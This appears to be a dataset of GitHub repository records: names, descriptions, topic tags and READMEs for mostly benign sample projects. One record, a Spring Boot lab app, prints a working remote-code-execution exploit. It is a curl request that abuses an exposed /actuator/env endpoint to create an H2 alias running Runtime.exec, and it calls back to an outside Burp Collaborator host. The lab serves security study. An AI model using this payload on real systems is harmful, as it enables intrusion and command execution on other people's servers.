8 Bit Artist sample featuring Real-Time Multiplayer and Nearby Connections
null
# 8 Bit Artist 8 Bit Artist is a fully-featured multiplayer game demonstrating the [Real-time Multiplayer](https://developers.google.com/games/services/android/realtimeMultiplayer) and [Nearby Connections](https://developers.google.com/games/services/android/nearby) APIs. <img src="screenshot.png" width="600" title="8 Bit Artist Screenshot"></img> ## Game Summary 8 Bit Artist is a multiplayer drawing game where the artist has very limited resources: 4 colors and 10x10 pixel canvas. The artist is given a word which he/she attempts to draw. It is the job of the other player(s) to guess what is being drawn as fast as possible. Points are awarded for guessing quickly, and players take turns drawing. There are two multiplayer game modes, each with the same gameplay but leveraging a different API: ### Real-time Multiplayer Mode ("Online" Mode) 8 Bit Artist can be played with 2-4 players anywhere in the world using the Play Game Services Real-time Multiplayer API. After signing in with your Google account, press the **Play Online** button to being matchmaking. You can select people you know, or use automatching to find random players that are online. In this mode players can leave the game at any time but you cannot join or re-join a game that is already in progress. This mode also uses the [Achievements](https://developers.google.com/games/services/android/achievements) API, which rewards players for achieving certain in-game milestones. > **Warning:** Real-time and turn-based multiplayer services are deprecated as of September 16th, 2019. These services are unavailable for new games. For more information, see [Ending support for multiplayer APIs in Play Games Services](https://support.google.com/googleplay/android-developer/answer/9469745). ### Nearby Connections Mode ("Party" Mode) In party mode, you can play 8 Bit Artist against 2+ people with devices connected to the same WiFi network. In this mode there is no need to sign in with Google and there is no server involved. Instead, the devices connect directly over WiFi and send messages to each other over the local network. In this mode the game has a "hop-in, hop-out" experience. One player is the game "host" and initiates the game with the **Host Party** button. All other players can join the game with the **Join Party** button. Non-host players can join and leave the game at any time, as long as the host does not end the game their scores are remembered even after a disconnection. There is also no theoretical limit to how many players can join in Nearby Mode, however the UI may not support displaying individual scores for very large numbers of players. ## Set Up The following steps will show you how to import, build, and run this sample app. These instructions assume you want to enable all features of the sample application. If you are only interested in Nearby Connections and not interested in Sign-in with Google, Real-time Multiplayer, or Achievements, you can skip directly to Step #2 (Android Studio). ### 1 - The Developer Console First, set up a project and link your app in the Developer Console. For more information, visit: [https://developers.google.com/games/services/console/enabling](https://developers.google.com/games/services/console/enabling) Make sure to take note of the **Package Name** and **App ID** from this step. Second, create the following five achievements in the Developer Console: | Name | Incremental? | # of Steps | |-------------------|--------------|------------| | 5 Turns | Yes | 5 | | 10 Turns | Yes | 10 | | Started a Game | No | N/A | | Guessed Correctly | No | N/A | | Got One Wrong | No | N/A | Make sure to record the **Achievement ID** for each created achievement, you will need them in later steps. ### 2 - Android Studio #### Import the Project Open Android Studio and click **File > Import Project**. Select the directory where you cloned the code from this repository. #### Modify Ids First, open `AndroidManifest.xml` and change the application package name to the package name you used in the Developer Console. Next, if you completed Step 1 and enabled Play Game Services for this sample, open `res/values/ids.xml` and replace each instance of `REPLACE_ME` with the appropriate value. For `app_id` this is your game's app ID from the Developer Console, and for each of the `achievement_*` values it is the ID of the achievement you created with the matching name. ## Run Build and run the game. You will need to run the game on a physical Android device with Google Play Services installed. It is recommended to build and run the game from Android Studio, however you can also build manually by running `./gradlew build` in the project directory and then installing the resulting application with `adb install <APK_LOCATION>`. ### Troubleshooting * To use Party Mode, your devices must be on the same WiFi network and the network must have [multicast](http://en.wikipedia.org/wiki/Multicast_DNS) enabled. * Make sure to sign your apk with the same certificate as the one whose fingerprint you configured on Developer Console, otherwise you will see errors. * If you are testing an unpublished game, make sure that the account you intend to sign in with (the account on the test device) is listed as a tester in the project on your Developer Console setup (check the list in the "Testing" section), otherwise the server will act as though your project did not exist and return errors.
1
kasecato/vscode-javadebug-sample
Java Debugging sample in Visual Studio Code
null
# Java Debugging in Visual Studio Code - [Maven + Jetty version](https://github.com/kasecato/vscode-javadebug-sample/tree/maven-jetty) ## Getting Started ### Install Extension * Microsoft, Java Extension Pack, https://marketplace.visualstudio.com/items?itemName=vscjava.vscode-java-pack ### Setting the JDK * Temurin, https://adoptium.net/ * Amazon, Corretto 17, https://docs.aws.amazon.com/corretto/latest/corretto-17-ug/downloads-list.html * Azule Systems, Zule OpenJDK, https://www.azul.com/downloads/ * OpenJDK, https://jdk.java.net/ * Red Hat, OpenJDK, https://developers.redhat.com/products/openjdk/download/ The path to the Java Development Kit is searched in the following order: * the `java.home` setting in VS Code settings (workspace then user settings) * the `JDK_HOME` environment variable * the `JAVA_HOME` environment variable * on the current system path ### Gradle Configurations * build.gradle ```groovy repositories { mavenCentral() } apply plugin: 'java' sourceCompatibility = 17 targetCompatibility = 17 compileTestJava { options.compilerArgs += '-parameters' } test { useJUnitPlatform() } dependencies { testImplementation('org.junit.jupiter:junit-jupiter:5.9.2') } ``` ### Build Configurations * .vscode/tasks.json ```json { "version": "2.0.0", "echoCommand": true, "command": "./gradlew", "presentation": { "echo": true, "reveal": "always", "focus": false, "panel": "shared" }, "tasks": [ { "label": "compileJava", "type": "shell" }, { "label": "test", "type": "shell", "group": { "kind": "test", "isDefault": true } }, { "label": "clean", "type": "shell" }, { "label": "build", "type": "shell", "group": { "kind": "build", "isDefault": true } } ] } ``` ### Java Debugger Configurations * .vscode/launch.json ```json { "version": "0.2.0", "configurations": [ { "type": "java", "name": "Debug (Launch)", "request": "launch", "cwd": "${workspaceFolder}", "console": "internalConsole", "stopOnEntry": false, "preLaunchTask": "compileJava", "mainClass": "com.vscode.demo.Main", "args": "" } ] } ``` ### Java programming * src/main/java/com/vscode/demo/Main.java ```java package com.vscode.demo; import java.util.Objects; import java.util.stream.Stream; public class Main { public static void main(String[] args) { System.out.println("Hello VS Code!"); Stream.of("React", "Angular", "Vue") .filter(x -> Objects.equals(x, "React")) .forEach(System.out::println); } } ``` * src/main/java/com/vscode/demo/MainTest.java ```java package com.vscode.demo; import java.util.Arrays; import java.util.List; import java.util.Objects; import org.junit.jupiter.api.DisplayName; import org.junit.jupiter.api.Tag; import org.junit.jupiter.api.Test; import static org.junit.jupiter.api.Assertions.assertEquals; @Tag("main") class MainTest { @Test @DisplayName("VS Code JUnit 5 test") void testMain() { // arrange final List<String> list = Arrays.asList("React", "Angular", "Vue"); // act final String actual = list.stream() .filter(x -> Objects.equals(x, "React")) .findFirst() .orElseThrow(IllegalArgumentException::new); // assert assertEquals("React", actual, () -> "Main Succeed"); } } ``` ### Debugging 1. Open `Main.java` 1. Press `F5` ### Testing 1. Open Command Pallete `cmd+shift+p` (macOS) or `ctrl+shift+p` (Windonws/Linux) 1. `Tasks Run Test Task` 1. `test` # References 1. Visual Studio Code, Java in VS Code, https://code.visualstudio.com/docs/languages/java 1. GitHub, Language Support for Java(TM) by Red Hat, https://github.com/redhat-developer/vscode-java 1. Visual Studio Code, Integrate with External Tools via Tasks, Variable substitution, https://code.visualstudio.com/Docs/editor/tasks#_variable-substitution 1. Gradle, Chapter 47. The Java Plugin, https://docs.gradle.org/current/userguide/java_plugin.html 1. GitHub, JUnit 5 Samples, https://github.com/junit-team/junit5-samples 1. Gradle, Gradle 4.6 Release Notes - JUnit 5 support, https://docs.gradle.org/4.6/release-notes.html#junit-5-support
1
BelooS/CircleToRect-ActivityTransition
Sample of how to perform circle to rect activity transition
null
null
1
SpringCloud/sample-zuul-swagger2
:palm_tree: A sample for zuul-swagger2 to test original services
null
![image](https://img.shields.io/badge/test-passing-green.svg) # sample-zuul-swagger2 :palm_tree: A sample for zuul-swagger2 to test original service sample-zuul-swagger2 是在Zuul中整合Swagger2,来动态生成源服务测试Dashboard的项目。 ``` @Configuration @EnableSwagger2 public class SwaggerConfig { //利用注入Zuul的配置文件,实现对路由源服务API的测试 @Autowired ZuulProperties properties; @Primary @Bean public SwaggerResourcesProvider swaggerResourcesProvider() { return () -> { List<SwaggerResource> resources = new ArrayList<>(); properties.getRoutes().values().stream() .forEach(route -> resources .add(createResource(route.getServiceId(), route.getServiceId(), "2.0"))); return resources; }; } private SwaggerResource createResource(String name, String location, String version) { SwaggerResource swaggerResource = new SwaggerResource(); swaggerResource.setName(name); swaggerResource.setLocation("/" + location + "/v2/api-docs"); swaggerResource.setSwaggerVersion(version); return swaggerResource; } } ``` ![image](https://github.com/SpringCloud/sample-zuul-swagger2/blob/master/img/1.png) ![image](https://github.com/SpringCloud/sample-zuul-swagger2/blob/master/img/2.png)
1
anthonygauthier/jmeter-elasticsearch-backend-listener
JMeter plugin that lets you send sample results to an ElasticSearch engine to enable live monitoring of load tests.
backend backend-listener cd ci continous-delivery continuous-integration elasticsearch elasticsearch-engine grafana java jmeter jmeter-plugin jmeter-plugins kibana listener performance performance-analysis performance-testing plugin reporting
[![Codacy Badge](https://api.codacy.com/project/badge/Grade/8a2f2a06171248acb6411a2d870558c8)](https://app.codacy.com/app/antho325/jmeter-elasticsearch-backend-listener?utm_source=github.com&utm_medium=referral&utm_content=delirius325/jmeter-elasticsearch-backend-listener&utm_campaign=Badge_Grade_Dashboard) [![Build Status](https://travis-ci.org/delirius325/jmeter-elasticsearch-backend-listener.svg?branch=master)](https://travis-ci.org/delirius325/jmeter-elasticsearch-backend-listener) # Overview ### Description JMeter ElasticSearch Backend Listener is a JMeter plugin enabling you to send test results to an ElasticSearch engine. It is meant as an alternative live-monitoring tool to the built-in "InfluxDB" backend listener of JMeter. ### Features * ElasticSearch low-level REST client * Using the low-level client makes the plugin compatible with any ElasticSearch version * X-Pack Authentication! * Just supply your crendentials in the specified fields! * Bulk requests * By making bulk requests, there are practically no impacts on the performance of the tests themselves. * Filters * Only send the samples you want by using Filters! Simply type them as follows in the field ``es.sample.filter`` : ``filter1;filter2;filter3`` or ``sampleLabel_must_contain_this``. * You can also choose to exclude certain samplers; `!!exclude_this;filter1;filter2` * Specific fields ```field1;field2;field3` * Specify fields that you want to send to ElasticSearch (possible fields below) * AllThreads * BodySize * Bytes * SentBytes * ConnectTime * ContentType * DataType * ErrorCount * GrpThreads * IdleTime * Latency * ResponseTime * SampleCount * SampleLabel * ThreadName * URL * ResponseCode * TestStartTime * SampleStartTime * SampleEndTime * Timestamp * InjectorHostname * ElapsedDuration * Verbose, semi-verbose, error only, and quiet mode * __debug__ : Send request/response information of all samplers (headers, body, etc.) * __info__ : Sends all samplers to the ElasticSearch engine, but only sends the headers, body info for the failed samplers. * __quiet__ : Only sends the response time, bytes, and other metrics * __error__ : Only sends the failing samplers to the ElasticSearch engine (Along with their headers and body information). * Use either Kibana or Grafana to vizualize your results! * [Click here to get a sample Grafana dashboard!](https://github.com/delirius325/jmeter-elasticsearch-backend-listener/wiki/JMeter-Generic-Dashboard) - All you need to do is import it into Grafana and change the data source! * Continuous Integration support - [Build comparison!](https://github.com/delirius325/jmeter-elasticsearch-backend-listener/wiki/Continuous-Integration---Build-Comparison) * Send JMeter variables to ElasticSearch! [Refer to this for more info!](https://github.com/delirius325/jmeter-elasticsearch-backend-listener/wiki/Sending-JMeter-variables) * New AWS ES parameters introducted in 2.6.0 version which leverage Role based authentication to access Elastic Search managed hosting on AWS * If your ES cluster is using a self signed certificate, you can set `es.ssl.verificationMode` to `none` to skip the hostname verification and cluster certificate validation. ### Maven ```xml <dependency> <groupId>io.github.delirius325</groupId> <artifactId>jmeter.backendlistener.elasticsearch</artifactId> <version>2.6.10-SNAPSHOT</version> </dependency> ``` ## Contributing Feel free to contribute by branching and making pull requests, or simply by suggesting ideas through the "Issues" tab. ### Packaging and testing your newly added code Execute below mvn command. Make sure JAVA_HOME is set properly ``` mvn package ``` Move the resulting JAR to your `JMETER_HOME/lib/ext`. ## Screenshots ### Configuration ![screnshot1](https://cdn-images-1.medium.com/max/2000/1*iVb7mIp2dPg7zE4Ph3PrGQ.png "Screenshot of configuration") ### Sample Grafana dashboard ![screnshot1](https://image.ibb.co/jW6LNx/Screen_Shot_2018_03_21_at_10_21_18_AM.png "Sample Grafana Dashboard") ### For more info For more information, here's a little [documentation](https://github.com/delirius325/jmeter-elasticsearch-backend-listener/wiki).
1
afsaredrisy/MediapipeHandtracking_GPU_Bitmap_Input
Handtracking mediapipe sample with bitmap RGB input
handtracking handtracking-bitmap mediapipe mediapipe-bitmap mediapipe-custom-input
# MediapipeHandtracking_GPU_Bitmap_Input Handtracking mediapipe sample with bitmap RGB input ## Demo Input Bitmap </br> ![input_bitmap](handtrackinggpu/res/drawable/img2.jpg) <B>Output</br> ![output_image](Screenshot_20191231_164913_com.google.mediapipe.apps.handtrackinggpu.jpg)
1
AndroidDeveloperLB/ThreePhasesBottomSheet
A bottom sheet sample that's similar to how Google Maps treat it
null
# ThreePhasesBottomSheet A bottom sheet sample that's similar to how Google Maps treat it. Example animation: ![enter image description here](https://raw.githubusercontent.com/AndroidDeveloperLB/ThreePhasesBottomSheet/master/device-2016-01-16-175728.gif) This is based mainly on these 2 repositories: - https://github.com/Flipboard/bottomsheet - https://github.com/chrisbanes/cheesesquare and was asked about on StackOverflow here: http://stackoverflow.com/q/34160423/878126 It might be possible to use this repository instead of the bottomSheet repo: https://github.com/umano/AndroidSlidingUpPanel known issues: -- first method, of using AppBarLayout,CoordinatorLayout , etc : - Tested on version 6, 4.2 and 4.4 . Not sure about the others. - doesn't handle well orientation changes. Handled in the sample by re-showing the bottom sheet, but it doesn't restore its state. - rare issue of being able to scroll inside the bottom sheet's content while it's still collapsed (at the bottom). Not sure if still exist. - can have weird issues (like showing in full-screen) in case the keyboard was shown before peeking. This is handled in the sample by just hiding the bottom sheet when the keyboard appears. - can't handle situations that the bottom sheet is larger in its peeked state, compared to when it's in expanded state. - when you press the back button to go from a scrolled expanded bottom sheet state, to the state of peek, it has some weird issues. Need to handle this, or make it work differently. In the sample, I chose to just dismiss the bottom sheet for this case. Second method, of using just a NestedScrollView : - doesn't snap for scrolling of the bottom sheet, when it's in expanded mode. not an issue, just a missing feature. - pressing the back button when the bottom sheen is expaneded can cause weird UI issues. - might have other issues.
1
Nasruddin/spring-boot-3-jwt-auth
:key: Sample Spring boot application secured using JWT auth in custom header(X-Auth-Token).
authentication authorization custom-jwt custom-jwt-auth jwt jwt-tokens openapi3 spring-boot spring-boot-3 spring-security spring-security-jwt swagger-documentation swagger-ui
# spring-boot-3-jwt-auth :key: Sample Spring boot 3 application for Authentication and Authorization ## Features * Customizable header(X-Auth-Token) to pass Auth token. * JWT for token creation and validation. * Role based authorization. * Device based auth. * Custom Validators * Spring doc. ## Running the sample app ``` mvn spring-boot:run ``` ## Registering a User ``` curl -X POST "http://localhost:9000/api/auth/register" -H "accept: */*" -H "Content-Type: application/json" -d "{\"username\":\"nasruddin\",\"password\":\"p@ssw00d\",\"device\":\"web\",\"email\":\"nasruddin@gmail.com\"}" ``` ``` { "id":2, "username":"nasruddin", "password":"$2a$10$U3CR4T1Gowd50Q.0yK/UuOh.XWVx0BYIe7BiAmymXZ.MYPUtU5F.e", "email":"nasruddin@gmail.com", "lastPasswordReset":"2023-09-14T08:41:10.080+00:00", "authorities":"ADMIN" } ``` H2-console can be accessed at <http://localhost:9000/api/h2-console> ![JWT Decoded](https://github.com/Nasruddin/spring-boot-jwt-auth/blob/pom-update/images/h2-console.png?raw=true) ## Login a User / Fetch Token ``` curl -X POST "http://localhost:9000/api/auth" -H "accept: */*" -H "Content-Type: application/json" -d "{\"username\":\"nasruddin\",\"password\":\"p@ssw00d\",\"device\":\"web\"}" ``` ``` {"token":"eyJhbGciOiJIUzUxMiJ9.eyJzdWIiOiJuYXNydWRkaW4iLCJhdWRpZW5jZSI6IndlYiIsImNyZWF0ZWQiOjE2OTQ2ODE2ODE3MDUsImV4cCI6MTY5NTI4NjQ4MX0.MydwIWzN3SgCvB8cYozKcR2tHMCM5nrIPXUBtx4o82ot1taL_NQM5TRHZ4yOc9uUcZFrz1XQAL_fDNXAIwmZxw"} ``` ![JWT Decoded](https://github.com/Nasruddin/spring-boot-3-jwt-auth/blob/master/images/decoded-jwt.png?raw=true) ## Accessing User/Protected API Without setting X-AUTH-TOKEN ``` curl -X GET "http://localhost:9000/api/user/nasruddin" -H "accept: */*" ``` ``` { "timestamp":"2023-09-14T08:57:08.403+00:00", "status":401, "error":"Unauthorized", "path":"/api/user/nasruddin" } ``` With setting X-AUTH-TOKEN ``` curl -X GET "http://localhost:9000/api/users/nasruddin" -H "accept: */*" -H "X-Auth-Token: eyJhbGciOiJIUzUxMiJ9.eyJzdWIiOiJuYXNydWRkaW4iLCJhdWRpZW5jZSI6IndlYiIsImNyZWF0ZWQiOjE2OTQ2ODE2ODE3MDUsImV4cCI6MTY5NTI4NjQ4MX0.MydwIWzN3SgCvB8cYozKcR2tHMCM5nrIPXUBtx4o82ot1taL_NQM5TRHZ4yOc9uUcZFrz1XQAL_fDNXAIwmZxw" ``` ``` { "id":1, "username":"nasruddin", "password":"$2a$10$dq6uFlehtetsfI6glLkA.OaeoIEu5PPqIVNZHDMCCiEej8b/0vhWa","email":"nasruddin@gmail.com", "lastPasswordReset":"2023-09-14T08:42:37.758+00:00", "authorities":"ADMIN" } ``` ## Admin API ``` curl -X GET "http://localhost:9000/api/admin" -H "accept: */*" -H "X-Auth-Token: eyJhbGciOiJIUzUxMiJ9.eyJzdWIiOiJuYXNydWRkaW4iLCJhdWRpZW5jZSI6IndlYiIsImNyZWF0ZWQiOjE2OTQ2ODE2ODE3MDUsImV4cCI6MTY5NTI4NjQ4MX0.MydwIWzN3SgCvB8cYozKcR2tHMCM5nrIPXUBtx4o82ot1taL_NQM5TRHZ4yOc9uUcZFrz1XQAL_fDNXAIwmZxw" ``` ``` :O ``` ## OpenAPI Swagger 1. Swagger can be accessed at <http://localhost:9000/api/swagger-ui/index.html> ![Swagger](https://github.com/Nasruddin/spring-boot-jwt-auth/blob/pom-update/images/swagger.png?raw=true) 2. API Docs can be accessed at <http://localhost:9000/api/api-docs> ![API Docs](https://github.com/Nasruddin/spring-boot-jwt-auth/blob/pom-update/images/open-api.png?raw=true)
1
snicoll/cfp-example
Sample app for the 10 ways to get super-productive with Spring Boot" talk"
null
null
1
antlr/jetbrains-plugin-sample
A sample plugin for jetbrains IDEs that uses an ANTLR grammar for a nontrivial custom language.
null
# Sample IntelliJ plugin using ANTLR grammar This is a demonstration of [ANTLRv4 library for IntelliJ plugins](https://github.com/antlr/antlr4-intellij-adaptor/), which makes it easy to create plugins for IntelliJ-based IDEs based on an ANTLRv4 grammar. <img src=screenshot.png> ## Running the plugin for the first time Make sure the Gradle plugin is installed in your IDE, go to `File -> Open`, select the `build.gradle` file and choose `Open as Project`. If you already imported the project when it was not based on Gradle, then choose the option to delete the existing project and reimport it. Once the IDE is done downloading dependencies and refreshing the project, you can use the `Gradle` tool window and use the following `Tasks`: * `build > assemble` to build the project * `intellij > runIde` to run the plugin in a sandboxed instance ## Noteworthy things ### Gradle build The build is based on Gradle, and uses the [gradle-intellij-plugin](https://github.com/JetBrains/gradle-intellij-plugin), which makes it easy to: * pull dependencies, especially the IntelliJ SDK and `antlr4-intellij-adaptor` * build and run tests in a CI environment on different versions of the SDK * generate lexers & parsers from your grammars, thanks to the [ANTLR plugin for Gradle](https://docs.gradle.org/current/userguide/antlr_plugin.html) * publish plugins to the [JetBrains Plugins Repository](https://plugins.jetbrains.com/) * configure the project for occasional contributors 🙂 ### ANTLRPsiNode PSI nodes defined in the plugin extend `ANTLRPsiNode` and `IdentifierDefSubtree`, which automatically makes them `PsiNameIdentifierOwner`s. ### Error highlighting Errors are shown by `SampleExternalAnnotator`, which makes use of `org.antlr.intellij.adaptor.xpath.XPath` to detect references to unknown functions. ### ParserDefinition `SampleParserDefinition` uses several handy classes from the adaptor library: * `PSIElementTypeFactory` to generate `IElementType`s from tokens and rules defined in your ANTLRv4 grammar * `ANTLRLexerAdaptor` to bind generated lexers to a `com.intellij.lexer.Lexer` * `ANTLRParserAdaptor` to bind generated parsers to a `com.intellij.lang.PsiParser` ## Misc **WARNING**. Turn on Dragon speech recognition for Mac and do a rename. GUI deadlocks. Every time. Turn off dragon. No problem ever. See [JetBrains forum](https://devnet.jetbrains.com/message/5566967#5566967).
1
tdunning/anomaly-detection
A simple demonstration of sub-sequence sampling as used for anomaly detection with EKG signals
null
### Anomaly Detection using Sub-sequence Clustering This project provides a demonstration of a simple time-series anomaly detector. The idea is to use sub-sequence clustering of an EKG signal to reconstruct the EKG. The difference between the original and the reconstruction can be used as a measure of how much like the signal is like a prototypical EKG. Poor reconstruction can thus be used to find anomalies in the original signal. The data for this demo are taken from physionet. See http://physionet.org/physiobank/database/#ecg-databases The particular data used for this demo is the Apnea ECG database which can be found at http://physionet.org/physiobank/database/apnea-ecg/ All necessary data for this demo is included as a resource in the source code (see src/main/resources/a02.dat). You can find original version of the training data at http://physionet.org/physiobank/database/apnea-ecg/a02.dat This file is 6.1MB in size and contains several hours of recorded EKG data from a patient in a sleep apnea study. This file contains 3.2 million samples of which we use the first 200,000 for training. ### Installing and Running the Demo The class com.tdunning.sparse.Learn goes through the steps required to read and process this data to produce a simple anomaly detector. The output of this program consists of the clustering itself (in dict.tsv) as well as a reconstruction of the test signal (in trace.tsv). These outputs can be visualized using the provided R script. To compile and run the demo, mvn -q exec:java -Dexec.mainClass=com.tdunning.sparse.Learn To produce the figures showing how the anomalies are detected rm *.pdf ; Rscript figures.r ### What the Figures Show Figure 1 shows how an ordinary, non-anomalous signal (top line) is reconstructed (middle line) with relatively small errors. Figures 2, 3 and 4 show magnified views of the successive 5 second periods. Looking at the distribution of the reconstruction error in Figure 5 shows that the error is distinctly not normally distributed. Instead, the distribution of the error has longer tails than the normal distribution would have. Figure 6 shows a histogram of the error. The standard deviation of the error magnitude is about 5, but nearly 2% of the errors are larger than 15 (3 standard deviations). This is implausibly large for a normal distribution which would only have less than 0.3% of the errors that large. Even more extreme, 50 samples per million are larger than 20 standard deviations. Scanning for errors greater than 100 takes us to a point 100 seconds into the recording where the error spikes sharply. Figure 7 shows the error and Figure 8 shows the original and reconstructed signal for this 5 second period. The reconstruction clearly isn't capturing the negative excursion of the original signal, but it isn't clear why. Figure 9 shows a magnified view of the 1 second right around the anomaly and we can see that the problem is a double beat. Scanning for more anomalies takes us to 240s into the trace where there is a clear signal acquisition malfunction as shown in Figures 10 and 11. The 64 most commonly used sub-sequence clusters are shown in figure 12. The left-most column shows how translations of the same portion of the heartbeat show up as clusters in the signal dictionary. These patterns are scaled, shifted and added to reconstruct the original signal.
0
OhadR/authentication-flows
oAuth2 sample: auth-server, resource server and client. Authentication-Flows" is also a sub-module here."
null
Authentication-Flows [![Build Status](https://travis-ci.org/OhadR/authentication-flows.svg?branch=master)](https://travis-ci.org/OhadR/authentication-flows) [![Maven Central](https://maven-badges.herokuapp.com/maven-central/com.ohadr/authentication-flows/badge.svg)](https://maven-badges.herokuapp.com/maven-central/com.ohadr/authentication-flows) ============= The Authentication-Flows JAR implements all authentication flows: * create account, * forgot password, * change password by user request, * force change password if password is expired, * locks the accont after pre-configured login failures. [It's own README](https://github.com/OhadR/authentication-flows/tree/master/authentication-flows) explains in detail all required configurations, API and more. The authentication-flows JAR *uses cryptography* in order to encrypt the data in the links that are sent to the user's email, upon user's registration and "forget password" flows. Read more about the encryption module [here](#jar-common-crypto---). This project *was* an oAuth2 POC, consists of all 3 oAuth parties. oAuth POC is now here: https://github.com/OhadR/oAuth2-sample 23-02-2016: Spring Versions Updated --------------------------- On 23-02-2016, we have updated Spring versions to the newest! * Spring Security: 4.0.3.RELEASE * Spring: 4.2.4.RELEASE * Spring Security oAuth: 2.0.9.RELEASE In addition, we have changed the build tool from Maven to **Gradle**. If you wish to use the older version, i.e. Maven and older Spring versions (3.1.X, oAuth 1.0.5), you can find it on a separated branch. The version in that branch is 1.6.2-SNAPSHOT (you can find in Maven Central the latest release, 1.6.2). The version on Master is 2.0.0-SNAPSHOT. Other Project Components ================== JAR: common-crypto [![Maven Central](https://maven-badges.herokuapp.com/maven-central/com.ohadr/common-crypto/badge.svg)](https://maven-badges.herokuapp.com/maven-central/com.ohadr/common-crypto) - Both oAuth identity-provider and the authentication-flows JAR use cryptography in order to encrypt the data: - oAuth encrypts the access-token - authentication-flows encrypts the user's password, - authentication-flows encrypts the links that are sent to the user's email, upon user's registration and "forget password" flows. The utility JAR, called "common-crypto", makes life easier. You can find it in this project, and it is available in [Maven Central Repository](http://search.maven.org/#search%7Cga%7C1%7Ccommon-crypto) as well. See [its own README](https://github.com/OhadR/authentication-flows/tree/master/common-crypto). JAR: auth-common [![Maven Central](https://maven-badges.herokuapp.com/maven-central/com.ohadr.oauth2/auth-common/badge.svg)](https://maven-badges.herokuapp.com/maven-central/com.ohadr.oauth2/auth-common) ------------ common code for authentication. You can find it also in this project, and also it is available in Maven repository: ```xml <dependency> <groupId>com.ohadr</groupId> <artifactId>auth-common</artifactId> <version>2.1-RELEASE</version> </dependency> ``` Note the version - make sure you use the latest. KeyStore things to know: ======================== 1. a keystore shall be created, both for SSL and for signing the tokens. 2. its alias and password should be updated in the prop file as well as in the tomcat's server.xml 3. algorithm should be DSA (because in the access-token signature my code expects it to be "SHA1withDSA" 4. if you want to work with "localhost", you should make the name "localhost": 5. http://stackoverflow.com/questions/6908948/java-sun-security-provider-certpath-suncertpathbuilderexception-unable-to-find/12146838#12146838 creating a token using Java's keytool: keytool.exe -genkeypair -alias <alias> -keypass <key-password> -keyalg DSA -keystore <file-name> -storepass <ks-password> -storetype JCEKS -v for example: C:\Dev\Tools>"%JAVA_HOME%\bin\keytool.exe" -genkeypair -alias alias -keypass kspass -keystore ohad.ks -storepass kspass -keyalg DSA -storetype JCEKS -v Note that your servlet container will have to be adapted to use this keysotre (for https use). For example, if you used the command above to create the keysotre, and you use tomcat, your server.xml file will have this section: ```xml <Connector port="8443" SSLEnabled="true" clientAuth="false" keystoreFile="c:\dev\tools\ohad.ks" keystorePass="kspass" keyAlias="alias" keystoreType="JCEKS" maxThreads="150" protocol="HTTP/1.1" scheme="https" secure="true" sslProtocol="TLS"/> ``` Java Encryption: ================ Cipher cipher = Cipher.getInstance("AES/ECB/PKCS5Padding"); SecretKeySpec secretKey = new SecretKeySpec(key, "AES"); cipher.init(Cipher.ENCRYPT_MODE, secretKey); String encryptedString = Base64.encodeBase64String(cipher.doFinal(strToEncrypt.getBytes())); return encryptedString; http://techie-experience.blogspot.co.il/2012/10/encryption-and-decryption-using-aes.html http://docs.oracle.com/javase/7/docs/api/javax/crypto/Cipher.html#init(int, java.security.Key) HTML forms: onSubmit vs action Why "Secret Question" mechanism is a Bad Thing ------------------------- The logic of "Secret Question" escapes me. Since the dawn of computer security we have been telling people, "DON'T make a password that is information about yourself that a hacker could discover or guess, like the name of your high school, or your favorite color. A hacker might be able to look up the name of your high school, or even if they don't know you or know anything about you, if you still live near where you went to school they might get it by tryinging local schools until they hit it. There are a small number of likely favorite colors so a hacker could guess that. Etc. Instead, a password should be a meaningless combination of letters, digits, and punctuation." But now we also tell them, "But! If you have a difficult time remembering that meaningless combination of letters, digits, and punctuation, no problem! Take some information about yourself that you can easily remember -- like the name of your high school, or your favorite color -- and you can use that as the answer to a 'security question', that is, as an alternative password." Indeed, security questions make it even easier for the hacker than if you just chose a bad password to begin with. At least if you just used a piece of personal information for your password, a hacker wouldn't necessarily know what piece of personal information you used. Did you use the name of your dog? Your birth date? Your favorite ice cream flavor? He'd have to try all of them. But with security questions, we tell the hacker exactly what piece of personal information you used as a password! Instead of using security questions, why don't we just say, "In case you forget your password, it is displayed on the bottom of the screen. If you're trying to hack in to someone else's account, you are absolutely forbidden from scrolling down." It would be only slightly less secure. [source](http://stackoverflow.com/questions/2734367/implement-password-recovery-best-practice) Why should we NEVER use CAPTCHA ------------------------- Well, [here is why](http://webdesignledger.com/tips/why-you-should-stop-using-captchas).
0
manoelcampos/padroes-projetos
🤝📘☕️🧩Design Patterns: Padrões de Projeto em Java com implementações OO e programação funcional, incluindo modelagem e exemplos realistas 😎
design-patterns fp functional-programming gof java object-oriented-programming oop padroes-de-projetos projects samples solid
null
0
spaceraccoon/spring-boot-actuator-h2-rce
Sample Spring Boot App Demonstrating RCE via Exposed env Actuator and H2 Database
null
# Spring Boot Actuator H2 RCE ## Introduction Writeup: [Remote Code Execution in Three Acts: Chaining Exposed Actuators and H2 Database Aliases in Spring Boot 2](https://spaceraccoon.dev/remote-code-execution-in-three-acts-chaining-exposed-actuators-and-h2-database) This is a sample app based off the default Spring Boot app in Spring's [documentation](https://spring.io/guides/gs/spring-boot-docker/) that demonstrates how an attacker can achieve RCE on an instance with an exposed `/actuator/env` endpoint and a H2 database. ## Usage First, start the app. You can do this locally or with Docker. ### Local If you run this locally, you need JDK 1.8 or later and Maven 3.2+. `./mvnw package && java -jar target/gs-spring-boot-docker-0.1.0.jar` ### Docker 1. `sudo docker build -t spaceraccoon/spring-boot-rce-lab .` 2. `sudo docker run -p 8080:8080 -t spaceraccoon/spring-boot-rce-lab` The app is now running on `localhost:8080`. ### Exploit 1. (Modify the curl request accordingly) `curl -X 'POST' -H 'Content-Type: application/json' --data-binary $'{\"name\":\"spring.datasource.hikari.connection-test-query\",\"value\":\"CREATE ALIAS EXEC AS CONCAT(\'String shellexec(String cmd) throws java.io.IOException { java.util.Scanner s = new\',\' java.util.Scanner(Runtime.getRun\',\'time().exec(cmd).getInputStream()); if (s.hasNext()) {return s.next();} throw new IllegalArgumentException(); }\');CALL EXEC(\'curl http://x.burpcollaborator.net\');\"}' 'http://localhost:8080/actuator/env'` 2. `curl -X 'POST' -H 'Content-Type: application/json' 'http://localhost:8080/actuator/restart'` You will receive a pingback.
1
hitherejoe/Pickr
A sample application demoing the Google Play Services Place Picker and Autocomplete
null
